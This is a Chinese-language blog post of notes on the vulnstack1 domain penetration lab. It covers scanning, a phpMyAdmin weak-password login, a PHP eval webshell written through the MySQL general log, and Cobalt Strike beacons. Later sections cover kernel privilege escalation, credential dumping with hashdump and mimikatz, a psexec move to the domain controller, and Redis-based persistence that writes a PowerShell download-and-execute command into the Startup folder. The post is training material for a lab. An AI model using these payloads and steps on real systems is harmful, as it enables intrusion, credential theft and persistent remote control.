

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.jpg">
  <link rel="icon" href="/img/fluid.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="huangdi">
  <meta name="keywords" content="">
  
    <meta name="description" content="内网域渗透入门靶场vulnstack1">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnstack1靶场笔记">
<meta property="og:url" content="http://huang-d1.github.io/2026/03/31/vulnstack1/index.html">
<meta property="og:site_name" content="huangdi&#39;s blog">
<meta property="og:description" content="内网域渗透入门靶场vulnstack1">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/phpstudy.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/redis.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/php%E6%8E%A2%E9%92%88.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/phpmyadmin.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/%E8%9A%81%E5%89%91.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/01.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/02.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/03.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/04.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/05.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/06.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/07.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/08.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/11.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/09.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/10.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/12.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/13.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/14.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/15.png">
<meta property="og:image" content="http://huang-d1.github.io/img/vulnstack1/16.png">
<meta property="article:published_time" content="2026-03-31T09:30:28.606Z">
<meta property="article:modified_time" content="2026-04-27T12:35:41.717Z">
<meta property="article:author" content="huangdi">
<meta property="article:tag" content="内网">
<meta property="article:tag" content="内网靶场">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://huang-d1.github.io/img/vulnstack1/phpstudy.png">
  
  
  
  <title>vulnstack1靶场笔记 - huangdi&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"huang-d1.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>huang-d1&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="vulnstack1靶场笔记"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-03-31 17:30" pubdate>
          2026年3月31日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          30 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">vulnstack1靶场笔记</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="vulnstack1"><a href="#vulnstack1" class="headerlink" title="vulnstack1"></a>vulnstack1</h1><h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">第一个靶场windows7 双网卡：VMnet8（NAT）+VMnet6 <br>第二个靶场win2k3 VMnet6 <br>第三个靶场windows2008 VMnet6 <br>攻击机kali 网卡VMnet8（NAT）<br></code></pre></td></tr></table></figure>

<p>win7靶机开启phpstudy</p>
<p><img src="/img/vulnstack1/phpstudy.png" srcset="/img/loading.gif" lazyload></p>
<p>windows2008开启redis服务</p>
<p><img src="/img/vulnstack1/redis.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>先用kali扫描网段</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -sn 192.168.89.0/24<br></code></pre></td></tr></table></figure>

<p>找到存活主机ip:192.168.89.135</p>
<p>进行端口扫描</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nmap -sC -sV -Pn -T5 192.168.89.143<br></code></pre></td></tr></table></figure>

<ol>
<li>跳过 ping 探测 (<code>-Pn</code>) - 直接扫描</li>
<li>全端口扫描（默认扫描 1000 个常用端口）</li>
<li>执行默认安全脚本 (<code>-sC</code>)</li>
<li>深度探测服务版本 (<code>-sV</code>)</li>
<li>以最快速度运行 (<code>-T5</code>)</li>
</ol>
<p>看到80和3306端口开放</p>
<h2 id="webshell打口子"><a href="#webshell打口子" class="headerlink" title="webshell打口子"></a>webshell打口子</h2><p>来看一下他的web网站<a target="_blank" rel="noopener" href="http://192.168.89.143/">http://192.168.89.143/</a></p>
<p>访问url打开后发现是phpstudy探针页面，可以看到网站绝对路径</p>
<p><img src="/img/vulnstack1/php%E6%8E%A2%E9%92%88.png" srcset="/img/loading.gif" lazyload></p>
<p>现在来爆破一下看看有没有网站后台</p>
<p>在一开始就扫到了phpmyadmin登陆页面，我们先来访问一下</p>
<p>root&#x2F;root弱口令直接登录</p>
<p><img src="/img/vulnstack1/phpmyadmin.png" srcset="/img/loading.gif" lazyload></p>
<p>这里我们关注到网站使用的mysql和php版本都是比较低的，还有一个特别的数据库</p>
<p>利用phpmyadmin后台全局日志文件写入getshell</p>
<p>读写权限+web绝对路径，修改日志文件为webshell</p>
<p>(1) 开启日志记录:</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs csharp"><span class="hljs-keyword">set</span> <span class="hljs-keyword">global</span> general_log=<span class="hljs-keyword">on</span>;<br></code></pre></td></tr></table></figure>

<p>(2) 指定日志文件</p>
<figure class="highlight csharp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs csharp"><span class="hljs-keyword">set</span> <span class="hljs-keyword">global</span> general_log_file = <span class="hljs-string">&#x27;C:/phpStudy/WWW/jwt.php&#x27;</span><br></code></pre></td></tr></table></figure>

<p>(3) 写入执行代码：</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">SELECT &#x27;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&quot;cmd&quot;</span>]);<span class="hljs-meta">?&gt;</span></span><span class="language-xml">&#x27; </span><br></code></pre></td></tr></table></figure>

<p>使用蚁剑连接一下</p>
<p><img src="/img/vulnstack1/%E8%9A%81%E5%89%91.png" srcset="/img/loading.gif" lazyload></p>
<p>此时连接成功实际上是获得了代码执行的权限，获得权限的高低与实际运行该进程的用户有关</p>
<p>一般运行Apache&#x2F;Nginx (Linux)的是www-data低权限用户，但是在这里可以看到whoami的回显是域管理员</p>
<p>反弹shell给cs</p>
<p>先生成一个payload</p>
<p><img src="/img/vulnstack1/01.png" srcset="/img/loading.gif" lazyload></p>
<p>把他放在蚁剑终端执行一下</p>
<p>看到成功在cs上线</p>
<p><img src="/img/vulnstack1/02.png" srcset="/img/loading.gif" lazyload></p>
<p>执行systeminfo命令获取本机信息</p>
<p>发现还有另一张网卡，ip地址为192.168.52.143，安装了四个修补程序</p>
<p><img src="/img/vulnstack1/03.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="win7提权"><a href="#win7提权" class="headerlink" title="win7提权"></a>win7提权</h2><p>使用内核漏洞提权</p>
<p><img src="/img/vulnstack1/04.png" srcset="/img/loading.gif" lazyload></p>
<p>利用MS14-058漏洞进行提权</p>
<p>这里直接利用脚本提权需要我们提前在cs里加载一些漏洞利用脚本，比较常用的是ElevateKit</p>
<p><a target="_blank" rel="noopener" href="https://github.com/rsmudge/ElevateKit">https://github.com/rsmudge/ElevateKit</a></p>
<p>选中上线主机右键 access-&gt;elevate-&gt;MS14-058</p>
<p>执行脚本完成后发现提权成功，获得system权限</p>
<p><img src="/img/vulnstack1/05.png" srcset="/img/loading.gif" lazyload></p>
<p>利用屏幕截图查看桌面文件，没有发现什么信息</p>
<p>使用命令 ipconfig &#x2F;all</p>
<p><img src="/img/vulnstack1/06.png" srcset="/img/loading.gif" lazyload></p>
<p>发现另一张网卡，判断为内网，DNS服务器地址为192.168.52.138，猜测是域控</p>
<h2 id="域内信息收集"><a href="#域内信息收集" class="headerlink" title="域内信息收集"></a>域内信息收集</h2><p>一些可参考的方法</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs bash">ipconfig /all   <span class="hljs-comment"># 查看本机ip，所在域</span><br>route <span class="hljs-built_in">print</span>     <span class="hljs-comment"># 打印路由信息</span><br>net view        <span class="hljs-comment"># 查看局域网内其他主机名</span><br>arp -a          <span class="hljs-comment"># 查看arp缓存</span><br>net start       <span class="hljs-comment"># 查看开启了哪些服务</span><br>net share       <span class="hljs-comment"># 查看开启了哪些共享</span><br>net share ipc$  <span class="hljs-comment"># 开启ipc共享</span><br>net share c$    <span class="hljs-comment"># 开启c盘共享</span><br>net use \\192.168.xx.xx\ipc$ <span class="hljs-string">&quot;&quot;</span> /user:<span class="hljs-string">&quot;&quot;</span>    <span class="hljs-comment"># 与192.168.xx.xx建立空连接</span><br>net use \\192.168.xx.xx\c$ <span class="hljs-string">&quot;密码&quot;</span> /user:<span class="hljs-string">&quot;用户名&quot;</span>    <span class="hljs-comment"># 建立c盘共享</span><br><span class="hljs-built_in">dir</span> \\192.168.xx.xx\c$\user    <span class="hljs-comment"># 查看192.168.xx.xx c盘user目录下的文件</span><br><br>net config Workstation    <span class="hljs-comment"># 查看计算机名、全名、用户名、系统版本、工作站、域、登录域</span><br>net user                 <span class="hljs-comment"># 查看本机用户列表</span><br>net user /domain         <span class="hljs-comment"># 查看域用户</span><br>net localgroup administrators    <span class="hljs-comment"># 查看本地管理员组（通常会有域用户）</span><br>net view /domain         <span class="hljs-comment"># 查看有几个域</span><br>net user 用户名 /domain   <span class="hljs-comment"># 获取指定域用户的信息</span><br>net group /domain        <span class="hljs-comment"># 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）</span><br>net group 组名 /domain    <span class="hljs-comment"># 查看域中某工作组</span><br>net group <span class="hljs-string">&quot;domain admins&quot;</span> /domain  <span class="hljs-comment"># 查看域管理员的名字</span><br>net group <span class="hljs-string">&quot;domain computers&quot;</span> /domain  <span class="hljs-comment"># 查看域中的其他主机名</span><br>net group <span class="hljs-string">&quot;doamin controllers&quot;</span> /domain  <span class="hljs-comment"># 查看域控制器（可能有多台）</span><br></code></pre></td></tr></table></figure>

<p>比较重要的还有查看防火墙和进程，识别并关闭杀软进程</p>
<p>有关域信息收集需要在域用户权限下执行命令，system身份执行域相关命令会报错</p>
<p>net config Workstation </p>
<p><img src="/img/vulnstack1/07.png" srcset="/img/loading.gif" lazyload></p>
<p>发现目前域中主机有三台</p>
<p>尝试匿名枚举域内用户</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">shell net view /domain:GOD<br></code></pre></td></tr></table></figure>

<p>该命令只能枚举出机器用户</p>
<p><img src="/img/vulnstack1/08.png" srcset="/img/loading.gif" lazyload></p>
<p>查找域控机器名</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nltest /DCLIST:god<br></code></pre></td></tr></table></figure>

<p>域控主机名为OWA</p>
<p><img src="/img/vulnstack1/11.png" srcset="/img/loading.gif" lazyload></p>
<p>探测内网存活主机和常见开放端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 扫描 52 段，探测常用端口（135, 445 是判定 Windows 机器的关键）</span><br>portscan 192.168.52.0/24 135,445 arp 1024<br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs bash">[04/26 21:04:48] beacon&gt; portscan 192.168.52.0/24 135,139,445,80 arp 1024<br>[04/26 21:04:48] [*] Tasked beacon to scan ports 135,139,445,80 on 192.168.52.0/24<br>[04/26 21:05:06] [+] host called home, sent: 95030 bytes<br>[04/26 21:05:08] [+] received output:<br>来自 192.168.52.138 的回复: 字节=32 时间&lt;1ms TTL=128<br>来自 192.168.52.141 的回复: 字节=32 时间=2ms TTL=128<br>来自 192.168.52.143 的回复: 字节=32 时间&lt;1ms TTL=128<br><br>[04/26 21:05:08] [+] received output:<br>(ARP) Target <span class="hljs-string">&#x27;192.168.52.1&#x27;</span> is alive. 00-50-56-C0-00-02<br><br>[04/26 21:05:21] [+] received output:<br>(ARP) Target <span class="hljs-string">&#x27;192.168.52.143&#x27;</span> is alive. 00-0C-29-A7-C1-A8<br>(ARP) Target <span class="hljs-string">&#x27;192.168.52.138&#x27;</span> is alive. 00-0C-29-34-AA-1B<br>(ARP) Target <span class="hljs-string">&#x27;192.168.52.141&#x27;</span> is alive. 00-0C-29-7A-89-B0<br><br>[04/26 21:05:31] [+] received output:<br>(ARP) Target <span class="hljs-string">&#x27;192.168.52.254&#x27;</span> is alive. 00-50-56-FA-4A-36<br>(ARP) Target <span class="hljs-string">&#x27;192.168.52.255&#x27;</span> is alive. 00-0C-29-A7-C1-A8<br><br>[04/26 21:05:35] [+] received output:<br>192.168.52.143:139<br>192.168.52.143:135<br>192.168.52.143:80<br>192.168.52.141:139<br>192.168.52.141:135<br>192.168.52.138:139<br>192.168.52.138:135<br>192.168.52.138:80<br>192.168.52.1:139<br>192.168.52.1:135<br><br>[04/26 21:05:42] [+] received output:<br>来自 192.168.52.138 的回复: 字节=32 时间&lt;1ms TTL=128<br><br>[04/26 21:05:43] [+] received output:<br>来自 192.168.52.141 的回复: 字节=32 时间&lt;1ms TTL=128<br><br>[04/26 21:05:44] [+] received output:<br>来自 192.168.52.143 的回复: 字节=32 时间&lt;1ms TTL=128<br><br>[04/26 21:05:51] [+] received output:<br>192.168.52.1:445<br>192.168.52.138:445<br><br>[04/26 21:05:52] [+] received output:<br>192.168.52.141:445 (platform: 500 version: 5.2 name: ROOT-TVI862UBEH domain: GOD)<br>192.168.52.143:445 (platform: 500 version: 6.1 name: STU1 domain: GOD)<br>Scanner module is complete<br></code></pre></td></tr></table></figure>

<h2 id="获取用户凭据"><a href="#获取用户凭据" class="headerlink" title="获取用户凭据"></a>获取用户凭据</h2><p>利用我们提权得到的system账户读取内存密码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 读内存密码</span><br>hashdump<br><span class="hljs-comment"># 用mimikatz读注册表密码</span><br>logonpasswords<br></code></pre></td></tr></table></figure>

<p><img src="/img/vulnstack1/09.png" srcset="/img/loading.gif" lazyload></p>
<p>在view-&gt;credential中可以看到用户和密码信息</p>
<p>好像只有Administrator是域用户</p>
<p><img src="/img/vulnstack1/10.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="攻击域控"><a href="#攻击域控" class="headerlink" title="攻击域控"></a>攻击域控</h2><p>之前我们已经得到域控地址是192.168.52.138，同时发现开放了445端口，可以运行SMB服务</p>
<p>这里我想用的是利用psexec夺取域控权限</p>
<p>psexec是微软官方提供的windows远程控制工具，原理是通过SMB连接到服务端的Admin$共享释放二进制文件</p>
<p>需要利用域管理员凭据登录控制远程主机</p>
<p>现在尝试jump</p>
<p>这里需要提前配置一个SMB监听器</p>
<p>view-&gt;tragets  </p>
<p><img src="/img/vulnstack1/12.png" srcset="/img/loading.gif" lazyload></p>
<p>上线成功</p>
<p><img src="/img/vulnstack1/13.png" srcset="/img/loading.gif" lazyload></p>
<h2 id="建立socks代理隧道"><a href="#建立socks代理隧道" class="headerlink" title="建立socks代理隧道"></a>建立socks代理隧道</h2><p>拿下一台内网主机后建立sock5代理</p>
<p><img src="/img/vulnstack1/14.png" srcset="/img/loading.gif" lazyload></p>
<p>记住这个端口号</p>
<p><img src="/img/vulnstack1/15.png" srcset="/img/loading.gif" lazyload></p>
<p>在kali利用proxychain工具通过此隧道连接</p>
<p>先修改配置文件 vim &#x2F;etc&#x2F;proxychains4.conf ，加入服务器ip和port</p>
<p>测试proxychains 是否能正常工作</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 测试1：查看出口IP（应该显示云服务器的IP）</span><br>proxychains4 curl -s ifconfig.me<br><br><span class="hljs-comment"># 测试2：测试内网 Redis 端口是否可达</span><br>proxychains4 nc -zv 192.168.52.138 6379<br><br><span class="hljs-comment"># 测试3：连接 Redis</span><br>proxychains4 redis-cli -h 192.168.52.138 -p 6379<br><br><span class="hljs-comment"># 如果 Redis 需要密码</span><br>proxychains4 redis-cli -h 192.168.52.138 -p 6379 -a 你的密码<br></code></pre></td></tr></table></figure>

<p>在 Kali 上通过代理使用其他工具</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 使用 nmap 扫描内网（注意：-sT 是必须的，SOCKS 不支持 SYN 扫描）</span><br>proxychains4 nmap -sT -Pn 192.168.52.0/24<br><br><span class="hljs-comment"># 使用 curl 访问内网 Web 服务</span><br>proxychains4 curl http://192.168.52.xxx<br><br><span class="hljs-comment"># 启动 Metasploit（所有流量都走代理）</span><br>proxychains4 msfconsole<br><br><span class="hljs-comment"># 使用 evil-winrm 连接内网 Windows</span><br>proxychains4 evil-winrm -i 192.168.52.xxx -u 用户名 -p 密码<br></code></pre></td></tr></table></figure>

<h2 id="利用redis服务实现持久化"><a href="#利用redis服务实现持久化" class="headerlink" title="利用redis服务实现持久化"></a>利用redis服务实现持久化</h2><p>域控上是开启着redis服务的(搭建环境时手动开启)</p>
<p>Windows 的<strong>启动文件夹</strong>中的程序会在用户登录时自动执行。redis服务一般拥有较高权限，攻击者通过 Redis 的 <code>CONFIG SET dir</code> 将 RDB 持久化文件写入启动目录，再<code>SAVE</code>触发写入，将恶意命令保存为 <code>.bat</code> 文件</p>
<p>先生成一个payload</p>
<p><img src="/img/vulnstack1/16.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">powershell.exe -nop -w hidden -c <span class="hljs-string">&quot;IEX ((new-object net.webclient).downloadstring(&#x27;http://ip:8086/a&#x27;))&quot;</span><br></code></pre></td></tr></table></figure>

<p>需要先进入到redis目录</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 1. 进入 Redis 目录</span><br>beacon&gt; <span class="hljs-built_in">cd</span> c:\redis<br><br><span class="hljs-comment"># 2. 连接本地 Redis</span><br>beacon&gt; redis-cli.exe -h 127.0.0.1 -p 6379<br></code></pre></td></tr></table></figure>

<p>在 <code>redis-cli</code> 交互环境中执行，在cs中需要用管道传入redis-cli.exe执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 1. 设置 RDB 文件保存路径</span><br>beacon&gt; shell <span class="hljs-built_in">echo</span> CONFIG SET <span class="hljs-built_in">dir</span> \&quot;C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\&quot; | redis-cli.exe -h 127.0.0.1 -p 6379<br><br><span class="hljs-comment"># 2. 设置文件名</span><br>beacon&gt; shell <span class="hljs-built_in">echo</span> CONFIG SET dbfilename startup.bat | redis-cli.exe -h 127.0.0.1 -p 6379<br><br><span class="hljs-comment"># 3. 写入恶意命令（注意转义）</span><br>beacon&gt; shell <span class="hljs-built_in">echo</span> SET x \&quot;\r\n\r\npowershell.exe -nop -w hidden -c \&quot;IEX ((new-object net.webclient).downloadstring(&#x27;http://ip:<span class="hljs-number">8086</span>/a&#x27;))“\&quot;\r\n\r\n\&quot; | redis-cli.exe -h 127.0.0.1 -p 6379<br><br><span class="hljs-comment"># 4. 触发保存</span><br>beacon&gt; shell <span class="hljs-built_in">echo</span> SAVE | redis-cli.exe -h 127.0.0.1 -p 6379<br></code></pre></td></tr></table></figure>

<p>是因为当前处于实验环境想测试运行，实际环境中拿到域控机器权限可以直接导出krbgt用户hash制作黄金票据实现权限持久化</p>
<h1 id="知识汇总"><a href="#知识汇总" class="headerlink" title="知识汇总"></a>知识汇总</h1><h2 id="phpmyadmin后台getshell"><a href="#phpmyadmin后台getshell" class="headerlink" title="phpmyadmin后台getshell"></a>phpmyadmin后台getshell</h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/liliyuanshangcao/p/13815242.html#_label1_0">https://www.cnblogs.com/liliyuanshangcao/p/13815242.html#_label1_0</a></p>
<h2 id="上传webshell获取代码执行权限"><a href="#上传webshell获取代码执行权限" class="headerlink" title="上传webshell获取代码执行权限"></a>上传webshell获取代码执行权限</h2><p>在渗透测试中，我们常说 WebShell 是一个“口子”，但从技术底层来看，它实际上是<strong>利用了 Web 服务器（如 IIS, Apache, Nginx）原本就拥有的执行能力。</strong></p>
